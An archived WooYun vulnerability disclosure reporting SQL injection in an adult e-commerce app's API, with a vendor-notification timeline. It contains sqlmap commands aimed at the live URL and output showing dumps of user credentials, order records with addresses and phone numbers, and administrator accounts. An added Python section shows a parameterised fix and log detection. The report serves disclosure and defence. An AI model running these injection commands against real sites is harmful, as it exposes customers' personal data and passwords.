WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-06-09: Details sent to the vendor, awaiting vendor action
2015-06-12: Vendor confirmed; details disclosed to the vendor only
2015-06-22: Details disclosed to core white hats and relevant domain experts
2015-07-02: Details disclosed to regular white hats
2015-07-12: Details disclosed to intern white hats
2015-07-27: Details disclosed to the public
Adult e-commerce site, orders flying all over the place
A vulnerability in the app's client-side API. I was actually searching for the Nice client and this app got pushed to me as a recommended install; honestly not something anyone needs to install... and then I found this hole. Explaining more would just be tears, so straight to the PoC. Databases:
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" --dbs
[00:15:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:15:46] [INFO] fetching database names
[00:15:46] [INFO] the SQL query used returns 6 entries
[00:15:46] [INFO] resumed: information_schema
[00:15:46] [INFO] resumed: easy_taodata
[00:15:46] [INFO] resumed: jp_taodata
[00:15:46] [INFO] resumed: oto
[00:15:46] [INFO] resumed: taodata
[00:15:46] [INFO] resumed: zhidao_taohwu
available databases [6]:
[*] easy_taodata
[*] information_schema
[*] jp_taodata
[*] oto
[*] taodata
[*] zhidao_taohwu
More than 200 tables
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata --tables
Database: taodata [203 tables]
760,000 users' phone numbers, passwords and other details
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_users -C user_name,password,user_id --dump --charset=UTF-8
[00:43:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:43:28] [INFO] fetching columns 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'
[00:43:28] [INFO] the SQL query used returns 3 entries
[00:43:28] [INFO] resumed: user_id
[00:43:28] [INFO] resumed: mediumint(8) unsigned
[00:43:28] [INFO] resumed: user_name
[00:43:28] [INFO] resumed: varchar(150)
[00:43:28] [INFO] resumed: password
[00:43:28] [INFO] resumed: varchar(32)
[00:43:28] [INFO] fetching entries of column(s) 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'
[00:43:28] [INFO] the SQL query used returns 764045 entries
380,000 order records
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_order_info --dump -C consignee,address,mobile,user_id --charset=UTF-8
[00:45:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:45:24] [INFO] fetching columns for table 'ecs_order_info' in database 'taodata'
[00:45:24] [INFO] the SQL query used returns 101 entries
[00:45:24] [INFO] fetching entries for table 'ecs_order_info' in database 'taodata'
[00:45:24] [INFO] the SQL query used returns 388531 entries
Administrator data
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_admin_user --dump --charset=UTF-8
[00:49:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:49:00] [INFO] fetching columns for table 'ecs_admin_user' in database 'taodata'
[00:49:00] [INFO] the SQL query used returns 14 entries
[00:49:00] [INFO] resumed: user_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: user_name
[00:49:00] [INFO] resumed: varchar(255)
[00:49:00] [INFO] resumed: email
[00:49:00] [INFO] resumed: varchar(255)
[00:49:00] [INFO] resumed: password
[00:49:00] [INFO] resumed: varchar(32)
[00:49:00] [INFO] resumed: add_time
[00:49:00] [INFO] resumed: int(11)
[00:49:00] [INFO] resumed: last_login
[00:49:00] [INFO] resumed: int(11)
[00:49:00] [INFO] resumed: last_ip
[00:49:00] [INFO] resumed: varchar(15)
[00:49:00] [INFO] resumed: action_list
[00:49:00] [INFO] resumed: text
[00:49:00] [INFO] resumed: nav_list
[00:49:00] [INFO] resumed: text
[00:49:00] [INFO] resumed: lang_type
[00:49:00] [INFO] resumed: varchar(50)
[00:49:00] [INFO] resumed: agency_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: suppliers_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: todolist
[00:49:00] [INFO] resumed: longtext
[00:49:00] [INFO] resumed: is_kf
[00:49:00] [INFO] resumed: tinyint(1)
[00:49:00] [INFO] fetching entries for table 'ecs_admin_user' in database 'taodata'
[00:49:00] [INFO] the SQL query used returns 15 entries
User information
Order information
Administrator information
Fix it as you see fit.
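The report does not show the server-side code, so the following is an added illustration (not code from the vendor or the original report) of how the `user_id` parameter of `api_pj.php?appfun=getBarUserInfo` could be handled safely, plus a detection check over constructed access-log lines for the same endpoint. It assumes the dumped column type (`user_id` mediumint(8) unsigned), models `ecs_users` with an in-memory SQLite table, and names like `get_bar_user_info` and `flag_suspicious_requests` are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The dumped schema types user_id as mediumint(8) unsigned: 0..16777215.
_USER_ID = re.compile(r"^[0-9]{1,8}$")


def is_valid_user_id(raw: str) -> bool:
    """Allow-list check: plain decimal digits within the column's range."""
    return bool(_USER_ID.match(raw)) and int(raw) <= 16777215


def get_bar_user_info(conn, raw_user_id: str):
    """Hardened lookup (hypothetical replacement handler): reject non-integer ids,
    then bind the value as a parameter so it never becomes part of the SQL text.
    Only user_id and user_name are returned, never the password column."""
    if not is_valid_user_id(raw_user_id):
        return None  # a real endpoint would answer HTTP 400 here
    row = conn.execute("SELECT user_id, user_name FROM ecs_users WHERE user_id = ?",
                       (int(raw_user_id),)).fetchone()
    return {"user_id": row[0], "user_name": row[1]} if row else None


def build_demo_db():
    """Constructed stand-in for ecs_users with two fake rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ecs_users (user_id INTEGER, user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO ecs_users VALUES (?, ?, ?)",
                     [(123, "alice", "x"), (124, "bob", "y")])
    return conn


def flag_suspicious_requests(log_lines):
    """Detection side: return access-log lines that call api_pj.php with a user_id
    that is not a plain integer, which is what probing of this parameter looks like."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m or "api_pj.php" not in m.group(1):
            continue
        values = parse_qs(urlsplit(m.group(1)).query).get("user_id", [])
        if any(not is_valid_user_id(v) for v in values):
            flagged.append(line)
    return flagged


# Constructed sample log lines (not real traffic); only the second one is probing.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jun/2015:00:15:46 +0800] "GET /api_pj.php?appfun=getBarUserInfo&user_id=123 HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Jun/2015:00:15:47 +0800] "GET /api_pj.php?appfun=getBarUserInfo&user_id=123%20AND%201%3D1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Jun/2015:00:15:48 +0800] "GET /index.php HTTP/1.1" 200 88',
]
```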
Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2015-06-12 13:47
CNVD has confirmed the vulnerability as described; no direct handling channel with the website's operating organization has been established yet, pending claim.
None yet